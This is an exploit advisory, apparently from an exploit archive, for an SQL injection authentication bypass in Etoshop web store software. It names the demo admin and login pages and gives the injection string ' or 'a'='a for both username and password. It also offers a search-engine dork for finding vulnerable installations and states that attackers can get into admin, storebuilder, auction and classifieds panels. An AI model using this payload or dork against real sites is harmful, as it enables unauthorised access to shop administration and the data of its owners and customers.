# Exploit Title: Etoshop (Auth Bypass) SQLi Vulnerability
# Vendor: http://www.etoshop.com
# Date: 12th July, 2011
# Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D (http://www.shadowrootkit.wordpress.com)
# Google Dork: ©2000 INNER ESTEEM SDN BHD

****************************************
(Auth Bypass) SQLi Vulnerability
****************************************

{DEMO}:
http://www.etoshop.com/demo/pcstore/admin.asp
http://www.etoshop.com/demo/sbd-login.asp
http://www.etoshop.com/demo/cac-login.asp
http://www.etoshop.com/demo/csf-login.asp

EXPLOIT:
Username: ' or 'a'='a
Password: ' or 'a'='a

Observe: Attackers can use Authentication Bypass to get into the Admin Panel, storebuilder, c2c auction and classifieds in the site.

****************************************
gr33t1ngs to s1d3 effects and my friends@!3.14--
****************************************